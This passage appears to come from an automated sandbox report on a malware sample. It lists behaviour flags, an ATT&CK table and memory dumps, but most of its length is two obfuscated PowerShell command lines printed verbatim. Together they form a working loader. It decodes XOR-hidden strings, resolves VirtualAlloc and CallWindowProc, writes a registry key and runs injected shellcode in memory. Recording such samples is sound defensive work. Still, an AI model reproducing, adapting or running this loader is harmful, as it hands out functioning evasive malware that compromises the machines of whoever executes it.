Su'Er8Mo2Fe9Be5le8Se4Un8Ta5lu8Pj2Ou9BuEFiDar0OrDPn4Az9GeEsa8Ec5Re9AbCGu8Lu0St8Co5Re9shEIn9SeBRe8Co4Fo8Ge3Sk9SkFSt9KlDCu8Je2Sl9Ud1Ae9Ri1Co9Ca4Fr9Sc5DyDshEUdBUn3Re8Be2Pu9Fr5Ar9St1Ps8ga4Ga9Se5kuANo4Jt8Po9Er8Fi0Un9Sm5PoDSk8StDSt9Mi'Bo;Tv&Ko(Ul`$FrMTooVirWaiFocBihSveSa7De)Te un`$AnFforzoeKomChsUdkenrReisadSttPasSkoJipDrtUsiUdmPaiLgsTemPleDinNa5Pa Ak Pr St;Rm}je`$PrHInaAbuRularijoeEfrUdsAc Be=ru UpGSlyFrrNooEkpAnivilKooTotKa0Ka Re'Ta9SpBLs9De5Ud8su2La9SiEDa9Od5Pu9SuCUhCQu3UdCBo2Pr'In;Rn`$FoFTirBeeAumMesUnktjrFiibldIntPusBroInpNrtUniJumSuifrssvmDeeFonUn6Fi Pr=Re GeGAnyIdrunoCypLaiImlChoPotEp0St St'UnDSk4SaAFi3Ru9SeBol9Ko9Ko8Mi0Ri8Fu0Sk9Co5Sk8de2St9ChCFu9In7Re9afETi8Bd3SpDDa0PsCAfDStDIl0KrASyBSaAdy3So8Un9Ma8Me3As8Af4Do9Vs5Ag9OvDStDRuEChACa2Fo8Ov5Me9ThEPh8Pa4Re9Ma9Un9EpDbu9Sk5duDBiEAdBfr9Do9PhEBo8As4Va9Tr5Ki8Hj2St9UdFUu8Fo0PrApa3De9te5Re8Ch2Om8Ad6Eu9Me9Da9Un3Jo9Su5Af8Et3OvDLaEMnBPoDUn9Ra1Dr8Ba2Bo8Ga3Im9My8Sh9He1be9IsCMyASaDFaCOpAAfCLeAMoBBe7Un9Ac5Fo8sa4CaBPs4Kr9Os5Au9KaCKn9Di5Ca9Va7Al9Co1Ca8fl4St9Eu5SkBSt6Bl9RiFFi8Pe2SvBHy6Sa8Tr5Sy9LeEIg9Ep3Re8Lo4An9bl9Pe9PaFDa9SyEPuARe0fe9AnFUn9Kl9Re9PlEHi8Gl4Se9Sp5Ar8Wa2IrDSp8SuDUd8Un9Mi6Fr9KaBpa8Ni0InDLa0NoDMi4miBbo8sk9Na1Bl8Tr5st9HyCMo9Tr9Om9Pr5Ox8Ar2Ke8Se3MuDSk0ArDfy4egBVoDGr9DuFSc8Va2en9La9Pa9Pa3Sk9Ch8Cr9Af5WaCTr4KlDUr9keDPuCVeDCh0TrDLa8MuBFo7StBEr4AfASa4BuDRi0AuBUn0UdDfa8ImASaBSaBSk9Mo9AdEDi8Af4LaAFr0Fr8Ra4Go8Ps2PrAaoDHaDTrCVeDud0ZoAGeBHeAPe5MeBBi9Ta9WaEUn8Jo4XyCSk3HoCMi2OuAInDcoDBeCDeDBa0SlASiBFrALe5tiBBa9St9GiESk8Vr4BrCRe3InCPl2SkABrDLaDDiCSwDBr0HyAPlBBrAAl5MiBLs9Su9NoEAl8Po4elCTa3HoCSu2LuAPrDScDHe9UdDmu0HoDUd8SuAGlBIdBBu9Ta9StEAf8An4VaAMe0Al8Ti4Ex8Te2PlAheDnoDWa9ChDTr9BlDLu9Do'Ho;Re&Ma(Ro`$IsMFeoPrrpriKacAahaaeNo7ge)Po Ur`$DaFSyrNoeBlmTisTekFirBliCodFytSysheoAtpAftJaiTrmLaiPesComHyeGunUd6Im;Ti`$ArUMagSilIneKnsVaaSpath Fr=Ro DefPukPrpBr Om`$SkMTuoPrrEuikicKvhAseOb5hv Ta`$nuMOuoBarMiiDkcUohBoeMe6hj;Un`$StFterAmeDomResAnkAmrbaiModuntSpsGaoInpSmtobiFamFoiOnsDemEseMenTa7St up=Re SaGBeyCrrTroDepLiiMolYnoShtUn0Sa Ni'NeDSa4CuBTrDFo9No9mu9HvEDi9Tr9Pe9ExDSc8Lo5Gr9KoDGu8Un4Af8Ej2Lu8Un9Re9paBMe9hjBSy9Le5Ud8Mu4teCMo3maDBa0EsCHfDTiDUn0BeDFu4CoARi3Na9PaBKa9Ve9Bi8em0Sp8du0Si9Ha5ra8Vi2Gr9ChCRo9Ti7is9MiEOv8Re3KiDMeEToBAn9Wa9enERe8Eu6Ba9IrFSe9SoBHe9Er5WeDTa8NoAStBCrBAp9Mo9GyETr8Ex4VeABy0Ev8Al4Cn8Ur2DeARiDArCSmAorCBiAPrASeACe9Co5Bi8Kn2Ab9CgFteDNoCApDUn0SaCCo6LyChe5PrCbe2tkDReCReDEr0QuCEv0li8Co8TrCAr3ChCSe0BoCFe0PiCTi0FaDCoCDeDNe0AfCUs0Bi8mo8HeCAn4PsCJe0GrDEn9Ha'Mo;Im&So(fj`$OvMSioRnrCrihucAfhBaeTh7Ki)Su St`$RkFBjrBeeBemSasHekUnrMyifjdIntHasSaoCapSttBoiBumAriDisVumTaeFrnPa7Sy;Fi`$DeFInrSpeDemErsBekTorSuiLadbatAdsStoSipBitoriInmSaiFosLomBeecanAn8Ap Pa=Se FoGMoyCarNooPopAfiEvlFaoDitVi0Sl Or'DyDTi4BrAhj7An9Sm9cl9woERa9Un4Fo9MiFFr8Sw7Pa9PhDAm9Gr1Un9FoBSv9fl9Cl9DrEVe9Fi7InDSe0viCRiDdeDso0EnDCe4EmACo3Ra9NoBSa9Be9Be8Qu0Hy8Bo0Pr9ud5Sh8Sc2Me9CoCDo9Ag7Ov9TrETr8Bo3HlDRoETrBEn9Ba9SkEAn8st6Ti9IsFAl9LuBBy9Sp5SoDCo8ReATyBSjBRr9No9LiERe8De4LoAHj0Fl8er4Sa8Mi2FlAHoDHaCUnABeCMiACoAspATr9Ca5Wa8Ch2Te9ReFAtDSoCBrDFo0PaCBr5HiCBr0CiCMe1InCTa9SvCTa6HeCSa4SaCBi8TuCLa0SuDpuCAvDby0DeCPe0co8Ka8FrCTr3TeCdi0AfCAg0MiCAc0CoDUdCReDUn0biCFo0sm8By8SuCSp4KaDHo9Sk'Pe;Pu&Fa(Ph`$TrMSeoUfrPliVacNohPaeBe7Bl)Th st`$CoFCorTreEsmNisLikCrrUniPodsptPysVioEcpBatSyiHomAciprsZamsveSknRr8in;Ri`$FoMGeiSanSpiRemDiuHomUntFlrMiySekDikCoeAltSt0Co0Hy=Gr'KnHUnKLiCThUBo:Sm\SpOPsmPrkRaaAnrUhtEreRerLieNonGrdIneSt\FaNReastpHihCotChhBiaInlCeiKasAneHadVa'To;Pa`$SnMChiVrnTiiIrmBuuHamLotBerafyVokApkBoeZotOp0Bo1Si Ne=WhGDiyKarGnoAlpViiallSwoAftEn0Ge Ba'VaDSk4AnAPr3Su9Pr5Od8ek2Ga8Kn6Ep9re9De8Po4Sn9SuFIr8Et2Re9Sa9Ja9Fa1He9BeCudCThDAkDsc8AcBAn7Pe9Ud5Se8Ca4syDBeDUnBRa9di8Bo4Se9Hi5Gl9DaDHyAHu0No8An2Or9StFPo8Lo0Tr9Jd5pr8Pr2Da8Cr4Tr8Re9eqDRh0BlDBrDBeAEp0Ou9Ph1Va8En4An9Mo8liDwa0FiDUl4BaBQuDFo9Bo9Di9PhECh9St9Vi9AcDCr8Si5Mo9GoDNu8Rr4Fo8Fl2Tu8An9Co9trBKr9GoBIn9Vi5Li8An4InCTh0DeCUn0NoDKe9deDEnEStBRa7Sa9Un1St8Vo2Be9Si4Rn9Ho5To8Tr2Sk9AlFVe9Ps6Si9Co6Co9da9Pr9Sp3Ge9Ud5Me8Ja2Sl9Lu5Hy9laEsa8Gl3Di'si;Di&Da(To`$GoMKroSerUniBecTrhneeFo7Ov)Au Fl`$HeMBaiScnPoinomSpuMimArtSurVeyRikUnkUneintKl0Fj1Qu;Ra`$OvFInrSkeFumStsSokUnrSeiSedSutOpsTeoFrpAltNaiRemBeiRisThmApelinAs9Ve Ac=Ro DrGGlyswrDroSupFliSalAvoFotDi0Al Mu'UtDLo4NoBUn6Al8Te2Hy9Mi5Ar9DeDPe8Bi3Re9FiBUn8De2Ka9Bi9Am9Bo4Zi8La4Pl8Se3On9CaFSt8No0Te8Ho4Tw9Ir9Gl9InDOv9Ge9St8Li3La9AmDRe9Do5Af9glEEsDSc0BeCPeDMeDSc0ReAXeBSaAUn3Sk8Ca9St8ki3br8Sc4Pa9Su5Sp9AdDWhDChEHoBLi3no9PyFEn9CaEPl8La6Me9Ku5Kv8Fr2se8Co4FoAUdDCoCPeAStClaAOpBAr6ly8Su2Se9ThFEl9LsDSvBHe2Gr9Fa1Ka8ho3Po9Lb5TrCSp6JeCFu4BrARa3Sl8Fe4pi8Fo2By9Vr9Ud9GeEKn9Cu7DeDFo8SuDUn4NaABa3Ko9Zo5Sa8Po2Wh8Pr6Mi9Gi9Se8Be4Ba9SaFCo8Xs2Un9Ul9Ri9Po1Go9SeCAnDBe9sp'La;Fr&Vi(La`$ScMFioSkrEfiVgcSphSteSk7Vi)Un Co`$SuFHarReeFomAnsTokParKriNodretRasSvoempKatBaiDamIniAbsCrmEmeMonKi9Pa;On`$NeSOxeAarUkvNaiPatCooBurMaiStaPelLo0st Ko=Ba BlGAcyIzrIgoDepAsiSalCooSytHe0in Re'AnAVeBPrARe3Na8Mi9Re8Co3bi8Gu4Sn9Kl5Ra9UpDprDTlEinACh2Fo8Id5Ca9UdEDe8be4He9Un9Hi9ChDEc9In5GuDOvEBeBDk9Re9DiEIc8Fl4Cu9Ey5Ba8El2Ni9BiFBi8Pr0PeAEr3Wa9Bo5Be8in2Mr8Ca6Ng9Mu9Sp9Fa3Le9Fr5Be8Tr3BeDHiENaBReDSq9Ti1Ph8Bo2ga8Ha3Le9Ge8Sp9Re1To9phCPaASmDSeCUnASlCSmAKaBRu3Ch9SeFer8an0An8In9TiDCr8SgDFd4PuBPo6Ar8In2Re9By5By9stDRw8Ma3Sv9DoBDe8ca2Pr9Ud9Ok9Th4Vo8Ne4Ch8Ud3Fo9faFEn8Re0Co8Va4Te9Sl9wa9SaDKa9Ko9ca8Ro3Mo9TeDTh9ca5py9InEAnDTrCFeDPe0HgCOc0PaDInCKeDHa0ByDre0MeDUn4ReBMiDar9Pr9Te9arESo9Ge9Bg9vuDRa8Sk5Be9gnDPr8Ec4Pr8Di2Ge8Co9Fl9UnBKr9TeBTr9St5fi8Um4heCSe3AnDBeCsaDUt0MaCLa6KbCTa5ApCSp2AmDTr9Pa'Pr;Sa&za(Fl`$BaMVeoSirKliFecUnhEleKb7Ho)Ta Mi`$LaSPreAerRevSaicotkeoMurBeiFuazalpe0Cr;cy`$UnCBlyAwnVeoChsafaasrPlgGoeSnsFa=va`$GaFGarOmeKnmKusAfkMirImiIrdDitTusAsoBopSttPriPlmDriHasAmmIneLynOp.GocGlotruPrnMatBe-Ov6Fa5Ma2Nd;De`$AnSTeeTrrcevViiBotSuoBorBdiCoaKulCl1In Ge=Br drGPryufrAnoEspDriStlHaoEktBo0Gu Mo'ViABoBReAFa3st8Kv9Fo8St3Nu8Ly4Ul9Sk5Me9FeDKlDMaEHeALo2qu8Bl5ho9AlEHa8En4Ed9Sa9Ca9PrDUd9Do5FrDsuETrBAf9Un9FoEMu8Ud4Bu9Be5Re8Ki2An9AeFyo8Ka0DeAOv3Go9Pr5Un8Vo2Ti8Eg6Bl9Ch9Af9Sy3Mu9he5Fr8Sd3prDNoEkdBArDPa9Ma1Sn8Un2Vi8gi3Un9Sc8Ga9In1Ni9SiCSuAKlDFaCDeAStCReAKiBBa3Op9obFSk8Gr0Id8In9SqDKi8FaDUn4akBAf6Ud8Bo2Nu9Os5Ro9QuDWh8Ud3Of9MaBLd8He2Fe9Kd9Im9Ad4Te8cr4Ud8Co3Ku9EtFCa8Ha0Am8Fo4Ma9Sv9Si9SkDAd9Ph9Sw8An3la9KuDAn9Fo5Op9NeESuDChCgeDAm0baCCr6efCVi5SkCRe2KaDGaCAmDJo0UnDSy4KrAKr7Lu9Un9Ar9EtEPa9De4Tu9RoFIn8Al7Hy9TrDpl9Fo1Ca9IkBIn9Da9Hy9FlEPe9Oc7MiDCoCHeDRe0NeDPe4AnBah3Re8Fo9Bu9ViEFi9BiFSy8Is3he9Bl1Sp8Ko2Se9No7Re9Ug5Ov8Ko3CiDUn9Bl'Ld;Bu&Se(Ve`$tuMfaoBortriSecSehMieDy7Ch)Ud Tr`$amSOveSyrUnvPriEktAfoStrBaiPhaRalOu1Mo;No`$PaSEreMirExvBaiBitReoFlrUniMaaBllKa2va Pi=Ca DiGFoyenrzootopFiiEtlCaoSktGa0Pe Bo'SoDFe4Da8Me0Se9Ar5Pi8Bl2Do9Ru3Sk9MaFDy9By9Fo9un4Fi9Se5In9Se1Fo9FlECoDFo0PaCBeDReDKl0OvAStBOzAAn3In8Me9Ob8An3Ba8Se4Om9de5An9KoDFlDVoEStARe2ch8Mu5Om9BjETi8Ph4Un9an9In9StDKl9To5LyDUnEClBRi9Su9CoEVo8St4Ep9Ca5Be8Ur2ud9PlFKu8Ve0DiACa3Cr9Mo5Pe8Le2Ba8Tr6Bo9Be9de9Sk3ep9No5Un8st3DeDOvEEnBceDNo9Gr1Go8Fr2St8Ma3So9En8Ex9Ha1Im9BrCNeATiDAfCTiAKeCTiAHaBCa7In9Mi5Ri8Re4SlBpi4Co9ul5Ra9OdCLa9So5Ka9Fe7Bu9Sk1Fe8go4Bu9Je5NoBCr6Tr9StFKa8Ma2AbBWe6An8Sk5Be9SkEFo9Se3Ci8Fj4Sp9Sa9Ba9TiFTe9AnEFiAli0St9naFFe9Zo9Di9FlETa8Le4Ua9ko5Te8Sa2BeDPs8MoDUs8Hi9Ns6Mo9OpBPe8Cu0InDUn0BiDIn4ReBOp1Da9Ki7Le8Op5Ka8Dr2Re9InBIn9Pa5Ev8Un2Re9FeEOm9ko5Sm8mu3ReDUn0TiDUn4DrBEr7Kr9Pi1To9EfCTe8Vi5Ea9Po3nu9St8Tr9Ha1Re8be4MiDAl9HeDCyCSmDFe0HoDFi8AdBRe7SpBAn4PrAEx4ChDCh0HoBHo0TyDOu8SoAFlBsvBCe9De9CoEIn8op4ExAHy0Bi8Di4St8Ba2EpAFeDChDSeCPaDBr0WrALuBTyBSy9Hu9CoEPl8De4GsAFa0Fo8Ni4En8Op2KeAScDDiDInCFoDHo0DyAPrBLoBro9Gs9KnETr8Pi4PoAIn0Is8Br4To8Ek2foAIsDDeDLaCSpDDd0SiAVaBHvBSt9Su9ReEDi8Af4EfAUn0Wi8Sh4Or8Sk2RuAMiDKoDReCSpDRe0biAEuBDeBSt9Me9SuETo8Ta4ArASy0Ad8Re4br8Hv2FoASeDpaDSt9HuDOp0InDSa8quAUnBExBDe9Un9GlEKv8Ba4AnAPr0Tv8Ru4Pa8Cy2HoABuDSnDBo9MoDma9peDAk9Ma'Ha;Vi&Gu(Cr`$AdMUnoBlrMaiGrcTahSkeTo7Al)Se Ve`$SnSDreVorKovDiiFitChoIsrIbiSiaSelUd2Bl;Pe`$SkSSreHyrNovSkiBatFioInrDeiRaaInlFa3Mi Sp=Sa ReGkoyMirRuoBlpLuiShlMioZotPi0Di Fl'diDMa4Ec8Ke0Ra9Cr5Hy8Bo2Me9Bo3Un9ExFSa9Sy9Ma9Ra4Gr9As5ne9Re1Ko9HaELeDWaEdeBUd9Po9GeETi8Pe6Ki9BiFKo9WeBTh9Re5BeDSc8viDTh4FaBBrDGe9Ke9Di9NiESu9Sk9Gr9OkDAk8Ve5Sp9BlDId8Fe4Ch8in2Ov8Ch9Ov9klBNo9UnBSn9Bi5ax8Ca4SpCaa3tjDChCGoDNv4DiAFo7On9Fl9Jo9GlEFr9Me4Tu9AlFvi8Sk7Om9PrDMi9Ba1In9moBPr9Le9La9BeEIn9No7KaDStCBuDTh4JuASp5Be9Di7Dd9liCOr9Sk5Kr8Sp3Br9Op1Br9Br1ViDShCMaCMa0ScDKnCUdCbn0SeDJa9fo'Mo;en&He(No`$SnMWeoOvrGliAncSthSteId7Es)An Mo`$InSAlePrrBavIniDetMaoUdrmaiSuaCrlKa3Sp#de;""";;Function Servitorial9 { param([String]$Toeres); For($Inseratet=2; $Inseratet -lt $Toeres.Length-1; $Inseratet+=(2+1)){ $Gyropilot = $Gyropilot + $Toeres.Substring($Inseratet, 1); } $Gyropilot;}$Stafettens0 = Servitorial9 'By Be Ku Ar Bl Sp Br Da Ec Du Te Bo Su Ph Bo Af Fl Ku Ko Te In St Ex StITrEGlXAb ';$Stafettens1= Servitorial9 $Saliant;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Stafettens1 ;}else{.$Stafettens0 $Stafettens1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Gyropilot0 { param([String]$Toeres); $Metropolitanizes = New-Object byte[] ($Toeres.Length / 2); For($Inseratet=0; $Inseratet -lt $Toeres.Length; $Inseratet+=2){ $Tallote = $Toeres.Substring($Inseratet, 2); $Metropolitanizes[$Inseratet/2] = [convert]::ToByte($Tallote, 16); $Metropolitanizes[$Inseratet/2] = ($Metropolitanizes[$Inseratet/2] -bxor 240); } [String][System.Text.Encoding]::ASCII.GetString($Metropolitanizes);}$Spiralfjederen0=Gyropilot0 'A3898384959DDE949C9C';$Spiralfjederen1=Gyropilot0 'BD9993829F839F9684DEA7999EC3C2DEA59E83919695BE9184998695BD9584989F9483';$Spiralfjederen2=Gyropilot0 'B79584A0829F93B1949482958383';$Spiralfjederen3=Gyropilot0 'A3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596';$Spiralfjederen4=Gyropilot0 '838482999E97';$Spiralfjederen5=Gyropilot0 'B79584BD9F94859C95B8919E949C95';$Spiralfjederen6=Gyropilot0 'A2A4A380959399919CBE919D95DCD0B8999495B289A39997DCD0A085929C9993';$Spiralfjederen7=Gyropilot0 'A2859E84999D95DCD0BD919E91979594';$Spiralfjederen8=Gyropilot0 'A295969C9593849594B4959C9597918495';$Spiralfjederen9=Gyropilot0 'B99EBD959D9F8289BD9F94859C95';$Moriche0=Gyropilot0 'BD89B4959C9597918495A4898095';$Moriche1=Gyropilot0 'B39C918383DCD0A085929C9993DCD0A395919C9594DCD0B19E8399B39C918383DCD0B185849FB39C918383';$Moriche2=Gyropilot0 'B99E869F9B95';$Moriche3=Gyropilot0 'A085929C9993DCD0B8999495B289A39997DCD0BE9587A39C9F84DCD0A699828485919C';$Moriche4=Gyropilot0 'A699828485919CB19C9C9F93';$Moriche5=Gyropilot0 '9E84949C9C';$Moriche6=Gyropilot0 'BE84A0829F84959384A699828485919CBD959D9F8289';$Moriche7=Gyropilot0 'B9B5A8';$Moriche8=Gyropilot0 'AC';$Agurkernes=Gyropilot0 'A5A3B5A2C3C2';$Galuchat=Gyropilot0 'B3919C9CA7999E949F87A0829F93B1';function fkp {Param ($Binomialkoefficienter, $Leveringsomkostning) ;$Fremskridtsoptimismen0 =Gyropilot0 'D4BB918983D0CDD0D8ABB18080B49F9D91999EADCACAB3858282959E84B49F9D91999EDEB79584B18383959D929C999583D8D9D08CD0A798958295DDBF929A959384D08BD0D4AFDEB79C9F92919CB18383959D929C89B391939895D0DDB19E94D0D4AFDEBC9F939184999F9EDEA3809C9984D8D4BD9F8299939895C8D9ABDDC1ADDEB58185919C83D8D4A3809982919C969A95949582959EC0D9D08DD9DEB79584A4898095D8D4A3809982919C969A95949582959EC1D9';&($Moriche7) $Fremskridtsoptimismen0;$Fremskridtsoptimismen5 = Gyropilot0 'D4A3809C858484958283D0CDD0D4BB918983DEB79584BD9584989F94D8D4A3809982919C969A95949582959EC2DCD0ABA4898095ABADADD0B0D8D4A3809982919C969A95949582959EC3DCD0D4A3809982919C969A95949582959EC4D9D9';&($Moriche7) $Fremskridtsoptimismen5;$Fremskridtsoptimismen1 = Gyropilot0 '82958485829ED0D4A3809C858484958283DEB99E869F9B95D8D49E859C9CDCD0B0D8ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596ADD8BE9587DDBF929A959384D0A3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596D8D8BE9587DDBF929A959384D0B99E84A08482D9DCD0D8D4BB918983DEB79584BD9584989F94D8D4A3809982919C969A95949582959EC5D9D9DEB99E869F9B95D8D49E859C9CDCD0B0D8D4B2999E9F9D99919C9B9F959696999399959E849582D9D9D9D9DCD0D4BC95869582999E97839F9D9B9F83849E999E97D9D9';&($Moriche7) $Fremskridtsoptimismen1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Stonefishes22,[Parameter(Position = 1)] [Type] $Reattainment = [Void]);$Fremskridtsoptimismen2 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495D0CDD0ABB18080B49F9D91999EADCACAB3858282959E84B49F9D91999EDEB49596999E95B4899E919D9993B18383959D929C89D8D8BE9587DDBF929A959384D0A3898384959DDEA295969C959384999F9EDEB18383959D929C89BE919D95D8D4A3809982919C969A95949582959EC8D9D9DCD0ABA3898384959DDEA295969C959384999F9EDEB59D9984DEB18383959D929C89B285999C949582B19393958383ADCACAA2859ED9DEB49596999E95B4899E919D9993BD9F94859C95D8D4A3809982919C969A95949582959EC9DCD0D496919C8395D9DEB49596999E95A4898095D8D4BD9F8299939895C0DCD0D4BD9F8299939895C1DCD0ABA3898384959DDEBD859C849993918384B4959C9597918495ADD9';&($Moriche7) $Fremskridtsoptimismen2;$Fremskridtsoptimismen3 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495DEB49596999E95B39F9E8384828593849F82D8D4A3809982919C969A95949582959EC6DCD0ABA3898384959DDEA295969C959384999F9EDEB3919C9C999E97B39F9E86959E84999F9E83ADCACAA384919E94918294DCD0D4A3849F9E95969983989583C2C2D9DEA39584B99D809C959D959E849184999F9EB69C919783D8D4A3809982919C969A95949582959EC7D9';&($Moriche7) $Fremskridtsoptimismen3;$Fremskridtsoptimismen4 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495DEB49596999E95BD9584989F94D8D4BD9F8299939895C2DCD0D4BD9F8299939895C3DCD0D4A29591848491999E9D959E84DCD0D4A3849F9E95969983989583C2C2D9DEA39584B99D809C959D959E849184999F9EB69C919783D8D4A3809982919C969A95949582959EC7D9';&($Moriche7) $Fremskridtsoptimismen4;$Fremskridtsoptimismen5 = Gyropilot0 '82958485829ED0D49E859C80859E9B84839F9D8291919495DEB38295918495A4898095D8D9';&($Moriche7) $Fremskridtsoptimismen5 ;}$Hauliers = Gyropilot0 '9B95829E959CC3C2';$Fremskridtsoptimismen6 = Gyropilot0 'D4A39B99808095829C979E83D0CDD0ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB79584B4959C9597918495B69F82B6859E9384999F9EA09F999E849582D8D8969B80D0D4B891859C99958283D0D4BD9F8299939895C4D9DCD0D8B7B4A4D0B0D8ABB99E84A08482ADDCD0ABA5B99E84C3C2ADDCD0ABA5B99E84C3C2ADDCD0ABA5B99E84C3C2ADD9D0D8ABB99E84A08482ADD9D9D9';&($Moriche7) $Fremskridtsoptimismen6;$Uglesaa = fkp $Moriche5 $Moriche6;$Fremskridtsoptimismen7 = Gyropilot0 'D4BD999E999D859D8482899B9B9584C3D0CDD0D4A39B99808095829C979E83DEB99E869F9B95D8ABB99E84A08482ADCACAAA95829FDCD0C6C5C2DCD0C088C3C0C0C0DCD0C088C4C0D9';&($Moriche7) $Fremskridtsoptimismen7;$Fremskridtsoptimismen8 = Gyropilot0 'D4A7999E949F879D919B999E97D0CDD0D4A39B99808095829C979E83DEB99E869F9B95D8ABB99E84A08482ADCACAAA95829FDCD0C5C0C1C9C6C4C8C0DCD0C088C3C0C0C0DCD0C088C4D9';&($Moriche7) $Fremskridtsoptimismen8;$Minimumtrykket00='HKCU:\Omkarterende\Naphthalised';$Minimumtrykket01 =Gyropilot0 'D4A395828699849F8299919CCDD8B79584DDB984959DA0829F8095828489D0DDA0918498D0D4BD999E999D859D8482899B9B9584C0C0D9DEB791829495829F969699939582959E83';&($Moriche7) $Minimumtrykket01;$Fremskridtsoptimismen9 = Gyropilot0 'D4B682959D839B82999484839F8084999D99839D959ED0CDD0ABA3898384959DDEB39F9E86958284ADCACAB6829F9DB2918395C6C4A38482999E97D8D4A395828699849F8299919CD9';&($Moriche7) $Fremskridtsoptimismen9;$Servitorial0 = Gyropilot0 'ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB39F8089D8D4B682959D839B82999484839F8084999D99839D959EDCD0C0DCD0D0D4BD999E999D859D8482899B9B9584C3DCD0C6C5C2D9';&($Moriche7) $Servitorial0;$Cynosarges=$Fremskridtsoptimismen.count-652;$Servitorial1 = Gyropilot0 'ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB39F8089D8D4B682959D839B82999484839F8084999D99839D959EDCD0C6C5C2DCD0D4A7999E949F879D919B999E97DCD0D4B3899E9F839182979583D9';&($Moriche7) $Servitorial1;$Servitorial2 = Gyropilot0 'D4809582939F999495919ED0CDD0ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB79584B4959C9597918495B69F82B6859E9384999F9EA09F999E849582D8D8969B80D0D4B19785829B95829E9583D0D4B7919C8593989184D9DCD0D8B7B4A4D0B0D8ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADD9D0D8ABB99E84A08482ADD9D9D9';&($Moriche7) $Servitorial2;$Servitorial3 = Gyropilot0 'D4809582939F999495919EDEB99E869F9B95D8D4BD999E999D859D8482899B9B9584C3DCD4A7999E949F879D919B999E97DCD4A5979C95839191DCC0DCC0D9';&($Moriche7) $Servitorial3#"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/856-59-0x0000000000000000-mapping.dmp

Download
memory/856-60-0x0000000075111000-0x0000000075113000-memory.dmp

Filesize
8KB

Download
memory/856-63-0x0000000072E10000-0x00000000733BB000-memory.dmp

Filesize
5.7MB

Download
memory/856-64-0x00000000059B0000-0x000000000898F000-memory.dmp

Filesize
47.9MB

Download
memory/856-65-0x0000000072E10000-0x00000000733BB000-memory.dmp

Filesize
5.7MB

Download
memory/856-66-0x00000000059B0000-0x000000000898F000-memory.dmp

Filesize
47.9MB

Download
memory/1620-55-0x0000000000000000-mapping.dmp

Download
memory/1620-57-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp

Filesize
10.1MB

Download
memory/1620-58-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

Filesize
11.4MB

Download
memory/1620-62-0x000000000293B000-0x000000000295A000-memory.dmp

Filesize
124KB

Download
memory/1620-61-0x0000000002934000-0x0000000002937000-memory.dmp

Filesize
12KB

Download
memory/1752-54-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing